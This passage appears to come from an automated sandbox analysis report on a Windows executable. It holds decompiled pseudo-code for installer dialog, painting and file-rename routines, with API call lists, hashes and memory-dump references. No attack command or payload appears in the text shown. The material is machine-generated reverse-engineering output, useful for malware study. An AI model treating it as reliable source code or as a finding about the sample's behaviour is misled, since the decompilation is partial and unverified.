						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E00406154(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404145(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404145(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42476c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d20 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d20 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d20 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42476c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E0040417A(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040417A(_v12);
								L93:
								return E004041AC(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                  0x00404b68
                  0x00404b70
                  0x00404b78
                  0x00404b7e
                  0x00404b96
                  0x00404b99
                  0x00404b9a
                  0x00404dc7
                  0x00404dce
                  0x00404de2
                  0x00404dd0
                  0x00404dd2
                  0x00404dd5
                  0x00404dd6
                  0x00404ddd
                  0x00404ddd
                  0x00404dee
                  0x00404dfc
                  0x00404dff
                  0x00404e15
                  0x00404e8a
                  0x00404e8d
                  0x00404e8f
                  0x00404e99
                  0x00404ea7
                  0x00404ea7
                  0x00404ea9
                  0x00404eb3
                  0x00404eb9
                  0x00404ebc
                  0x00404ebf
                  0x00404eda
                  0x00404ec1
                  0x00404ecb
                  0x00404ecb
                  0x00404ebf
                  0x00404eb3
                  0x00000000
                  0x00404e8d
                  0x00404e1a
                  0x00404e25
                  0x00404e2a
                  0x00404e31
                  0x00404e36
                  0x00404e3a
                  0x00404e45
                  0x00404e45
                  0x00404e49
                  0x00404e4d
                  0x00404e51
                  0x00404e64
                  0x00404e53
                  0x00404e53
                  0x00404e5a
                  0x00404e60
                  0x00404e5c
                  0x00404e5c
                  0x00404e5c
                  0x00404e5a
                  0x00404e68
                  0x00404e6a
                  0x00404e7d
                  0x00404e80
                  0x00404e83
                  0x00404e83
                  0x00404e4d
                  0x00000000
                  0x00404e3a
                  0x00404e1c
                  0x00404e23
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404edd
                  0x00404edd
                  0x00404ee4
                  0x00404f55
                  0x00404f5d
                  0x00404f65
                  0x00404f65
                  0x00404f6e
                  0x00404f70
                  0x00404f77
                  0x00404f7a
                  0x00404f7a
                  0x00404f80
                  0x00404f87
                  0x00404f8a
                  0x00404f8a
                  0x00404f90
                  0x00404f96
                  0x00404f9c
                  0x00404f9c
                  0x00404fa9
                  0x00405109
                  0x00405110
                  0x0040512d
                  0x00405133
                  0x00405145
                  0x00405145
                  0x00000000
                  0x00404faf
                  0x00404fb1
                  0x00404fb6
                  0x00404fbb
                  0x00404fc0
                  0x00404fc2
                  0x00404fc2
                  0x00404fc3
                  0x00404fc4
                  0x00404fc6
                  0x00404fc6
                  0x00404fce
                  0x0040500f
                  0x00405011
                  0x00405021
                  0x00405024
                  0x00405029
                  0x00405030
                  0x00405033
                  0x004050d5
                  0x004050dd
                  0x004050e5
                  0x004050e5
                  0x004050eb
                  0x004050f3
                  0x00405104
                  0x00405104
                  0x00000000
                  0x004050f3
                  0x00405039
                  0x0040503c
                  0x00405042
                  0x00405047
                  0x00405049
                  0x0040504b
                  0x00405051
                  0x00405058
                  0x0040505d
                  0x00405064
                  0x00405067
                  0x00405067
                  0x0040506e
                  0x0040507a
                  0x0040507e
                  0x00405080
                  0x00405080
                  0x00405070
                  0x00405072
                  0x00405072
                  0x004050a0
                  0x004050ac
                  0x004050bb
                  0x004050bb
                  0x004050bd
                  0x004050c0
                  0x004050c9
                  0x00000000
                  0x00404fd0
                  0x00404fdb
                  0x00404fde
                  0x00404fe3
                  0x00404fe5
                  0x00404fe9
                  0x00404ff9
                  0x00405003
                  0x00405005
                  0x00405008
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404feb
                  0x00404feb
                  0x00404ff1
                  0x00404ff3
                  0x00404ff3
                  0x00404ff4
                  0x00404ff5
                  0x00000000
                  0x00404feb
                  0x00404fce
                  0x00404fa9
                  0x00404eec
                  0x00000000
                  0x00404f02
                  0x00404f0c
                  0x00404f11
                  0x00000000
                  0x00000000
                  0x00404f23
                  0x00404f28
                  0x00404f34
                  0x00404f34
                  0x00404f36
                  0x00404f45
                  0x00404f47
                  0x00404f4b
                  0x00404f4e
                  0x00000000
                  0x00404f4e
                  0x00404eec
                  0x00404ba0
                  0x00404ba3
                  0x00404ba6
                  0x00404bb6
                  0x00404bc9
                  0x00404bd4
                  0x00404bda
                  0x00404be8
                  0x00404bfb
                  0x00404c00
                  0x00404c0b
                  0x00404c14
                  0x00404c2a
                  0x00404c3a
                  0x00404c46
                  0x00404c46
                  0x00404c4b
                  0x00404c51
                  0x00404c53
                  0x00404c56
                  0x00404c5b
                  0x00404c60
                  0x00404c62
                  0x00404c62
                  0x00404c82
                  0x00404c82
                  0x00404c84
                  0x00404c85
                  0x00404c8a
                  0x00404c90
                  0x00404c94
                  0x00404c99
                  0x00404ca1
                  0x00404ca5
                  0x00404caa
                  0x00404caf
                  0x00404cb7
                  0x00404cba
                  0x00404d89
                  0x00404d9c
                  0x00000000
                  0x00404cc0
                  0x00404cc3
                  0x00404cc6
                  0x00404cc9
                  0x00404cc9
                  0x00404cce
                  0x00404cd7
                  0x00404cda
                  0x00404cde
                  0x00404ce1
                  0x00404ce4
                  0x00404ced
                  0x00404cf6
                  0x00404cf9
                  0x00404cfc
                  0x00404cff
                  0x00404d3d
                  0x00404d68
                  0x00404d3f
                  0x00404d4e
                  0x00404d4e
                  0x00404d01
                  0x00404d04
                  0x00404d12
                  0x00404d1c
                  0x00404d24
                  0x00404d2b
                  0x00404d36
                  0x00404d36
                  0x00404cff
                  0x00404d6e
                  0x00404d6f
                  0x00404d7b
                  0x00404d7b
                  0x00404d87
                  0x00404da2
                  0x00404da5
                  0x00404dc2
                  0x00000000
                  0x00404da7
                  0x00404dac
                  0x00404db5
                  0x00405147
                  0x00405159
                  0x00405159
                  0x00404da5
                  0x00000000
                  0x00404d87
                  0x00404cba

                  APIs
                  • GetDlgItem.USER32 ref: 00404B61
                  • GetDlgItem.USER32 ref: 00404B6E
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BBD
                  • LoadImageA.USER32 ref: 00404BD4
                  • SetWindowLongA.USER32 ref: 00404BEE
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C00
                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C14
                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C2A
                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C36
                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C46
                  • DeleteObject.GDI32(00000110), ref: 00404C4B
                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C76
                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C82
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D1C
                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D4C
                    • Part of subcall function 0040417A: SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D60
                  • GetWindowLongA.USER32 ref: 00404D8E
                  • SetWindowLongA.USER32 ref: 00404D9C
                  • ShowWindow.USER32(?,00000005), ref: 00404DAC
                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EA7
                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F0C
                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F21
                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F45
                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F65
                  • ImageList_Destroy.COMCTL32(?), ref: 00404F7A
                  • GlobalFree.KERNEL32 ref: 00404F8A
                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405003
                  • SendMessageA.USER32(?,00001102,?,?), ref: 004050AC
                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050BB
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050E5
                  • ShowWindow.USER32(?,00000000), ref: 00405133
                  • GetDlgItem.USER32 ref: 0040513E
                  • ShowWindow.USER32(00000000), ref: 00405145
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 2564846305-813528018
                  • Opcode ID: 47f2d9c36709d7288c2157f5155d2d55d121774a694b688cb793ee6afb5df1ef
                  • Instruction ID: 035ac8a7469eee7f523ea9a41678d20bac9593c5f5e0b875cc373c12e4cd4a79
                  • Opcode Fuzzy Hash: 47f2d9c36709d7288c2157f5155d2d55d121774a694b688cb793ee6afb5df1ef
                  • Instruction Fuzzy Hash: 63025DB0A00209AFDF209F94DD45AAE7BB5FB84354F50813AF610BA2E1D7799D42CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004042B0, Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E004042B0(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x41fcf4 =  *0x41fcf4 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041AC(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x4236c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E00404554(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424728, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424728, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x41fcf4 != 0) {
						goto L25;
					} else {
						_t112 =  *0x420500 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404167(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404530();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x423efc; // 0x81b80f
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x424778;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040427B;
				E00404145(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00404145(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404167( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E0040417A(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x424734 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x41fcf4 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x41fcf4 = 0;
				return 0;
			}


















                  0x004042c0
                  0x004043e5
                  0x00404441
                  0x00404445
                  0x00404512
                  0x00404514
                  0x00404514
                  0x0040451a
                  0x0040451a
                  0x0040451d
                  0x00000000
                  0x00404524
                  0x00404453
                  0x00404455
                  0x0040445f
                  0x0040446a
                  0x0040446d
                  0x00404470
                  0x0040447b
                  0x0040447e
                  0x00404485
                  0x00404493
                  0x004044ab
                  0x004044ad
                  0x004044b5
                  0x004044c4
                  0x004044c6
                  0x004044c6
                  0x00404485
                  0x004044d0
                  0x00000000
                  0x004044db
                  0x004044df
                  0x004044f0
                  0x004044f0
                  0x004044f6
                  0x00404504
                  0x00404504
                  0x00000000
                  0x00404508
                  0x004044d0
                  0x004043f0
                  0x00000000
                  0x00404404
                  0x0040440a
                  0x00404410
                  0x00000000
                  0x00000000
                  0x00404435
                  0x00404437
                  0x0040443c
                  0x00000000
                  0x0040443c
                  0x004043f0
                  0x004042c6
                  0x004042c9
                  0x004042ce
                  0x004042d0
                  0x004042df
                  0x004042df
                  0x004042e6
                  0x004042e9
                  0x004042eb
                  0x004042f0
                  0x004042f9
                  0x004042ff
                  0x0040430b
                  0x0040430e
                  0x00404317
                  0x0040431c
                  0x0040431f
                  0x00404324
                  0x0040433b
                  0x00404342
                  0x00404355
                  0x00404358
                  0x0040436d
                  0x00404374
                  0x00404379
                  0x0040437e
                  0x0040437e
                  0x0040438d
                  0x0040439c
                  0x004043ae
                  0x004043b3
                  0x004043c3
                  0x004043c5
                  0x00000000

                  APIs
                  • CheckDlgButton.USER32 ref: 0040433B
                  • GetDlgItem.USER32 ref: 0040434F
                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040436D
                  • GetSysColor.USER32(?), ref: 0040437E
                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040438D
                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040439C
                  • lstrlenA.KERNEL32(?), ref: 0040439F
                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043AE
                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043C3
                  • GetDlgItem.USER32 ref: 00404425
                  • SendMessageA.USER32(00000000), ref: 00404428
                  • GetDlgItem.USER32 ref: 00404453
                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404493
                  • LoadCursorA.USER32 ref: 004044A2
                  • SetCursor.USER32(00000000), ref: 004044AB
                  • LoadCursorA.USER32 ref: 004044C1
                  • SetCursor.USER32(00000000), ref: 004044C4
                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044F0
                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404504
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                  • String ID: Mfkeoxlzmclr$N${B@
                  • API String ID: 3103080414-3866707658
                  • Opcode ID: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                  • Instruction ID: c600905809f0113b99b24623cb0d1ad186d6442f8c09b0c76a4ffb62e5d10872
                  • Opcode Fuzzy Hash: acb20318001dbc993e8a8a4388a34ea8f8254a099665a8e39094a0f64cc29e55
                  • Instruction Fuzzy Hash: 5661C7B1A00209BFEB109F60CD45F6A7B69FB84714F10813AFB057A1D1C7B89951CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424734;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f20, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424728;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                  0x0040100a
                  0x00401039
                  0x00401047
                  0x0040104d
                  0x00401051
                  0x0040105b
                  0x00401061
                  0x00401064
                  0x004010f3
                  0x00401089
                  0x0040108c
                  0x004010a6
                  0x004010bd
                  0x004010cc
                  0x004010cf
                  0x004010d5
                  0x004010d9
                  0x004010e4
                  0x004010ed
                  0x004010ef
                  0x004010ef
                  0x00401100
                  0x00401105
                  0x0040110d
                  0x00401110
                  0x00401112
                  0x00401118
                  0x0040111f
                  0x00401126
                  0x00401130
                  0x00401142
                  0x00401156
                  0x00401160
                  0x00401165
                  0x00401165
                  0x00401110
                  0x0040116e
                  0x00000000
                  0x00401178
                  0x00401010
                  0x00401013
                  0x00401015
                  0x0040101f
                  0x0040101f
                  0x00000000

                  APIs
                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32 ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32 ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F
                  • API String ID: 941294808-1304234792
                  • Opcode ID: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                  • Instruction ID: f39fc87f540bacaa9a77f224585c2e26811c2c777a6195e868dd16c74e67a44d
                  • Opcode Fuzzy Hash: 927d9f4f17401607196459c248a51bb8bdb5d1fd0febad51b1ec1e4e61243643
                  • Instruction Fuzzy Hash: AA419D71800209AFCF058FA5DE459AF7FB9FF45315F00802AF591AA1A0CB34DA55DFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405D30, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405D30(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ab8 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x422eb8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226b8, "%s=%s\r\n", 0x422ab8, 0x422eb8);
						_t53 = _t52 + 0x10;
						E00406154(_t37, 0x400, 0x422eb8, 0x422eb8,  *((intOrPtr*)( *0x424734 + 0x128)));
						_t12 = E00405C5A(0x422eb8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405CD2(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BBF(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BBF(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C15(_t24 + _t46, 0x4226b8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D01(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C5A(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ab8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                  0x00405d30
                  0x00405d39
                  0x00405d40
                  0x00405d54
                  0x00405d7c
                  0x00405d87
                  0x00405d8b
                  0x00405dab
                  0x00405db2
                  0x00405dbc
                  0x00405dc9
                  0x00405dce
                  0x00405dd3
                  0x00405dd7
                  0x00405de6
                  0x00405de8
                  0x00405df5
                  0x00405df9
                  0x00405e94
                  0x00000000
                  0x00405e0f
                  0x00405e1c
                  0x00405e40
                  0x00405e44
                  0x00405e63
                  0x00405e67
                  0x00405e67
                  0x00405e69
                  0x00405e72
                  0x00405e7d
                  0x00405e88
                  0x00405e8e
                  0x00000000
                  0x00405e8e
                  0x00405e46
                  0x00405e49
                  0x00405e54
                  0x00405e50
                  0x00405e52
                  0x00405e53
                  0x00405e53
                  0x00405e5b
                  0x00405e5d
                  0x00000000
                  0x00405e5d
                  0x00405e27
                  0x00405e2d
                  0x00000000
                  0x00405e2d
                  0x00405df9
                  0x00405dd7
                  0x00405d56
                  0x00405d61
                  0x00405d6a
                  0x00405d6e
                  0x00000000
                  0x00000000
                  0x00405d6e
                  0x00405e9f

                  APIs
                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EC1,?,?), ref: 00405D61
                  • GetShortPathNameA.KERNEL32 ref: 00405D6A
                    • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                    • Part of subcall function 00405BBF: lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                  • GetShortPathNameA.KERNEL32 ref: 00405D87
                  • wsprintfA.USER32 ref: 00405DA5
                  • GetFileSize.KERNEL32(00000000,00000000,00422EB8,C0000000,00000004,00422EB8,?,?,?,?,?), ref: 00405DE0
                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DEF
                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E27
                  • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,004226B8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E7D
                  • GlobalFree.KERNEL32 ref: 00405E8E
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E95
                    • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00405C5E
                    • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
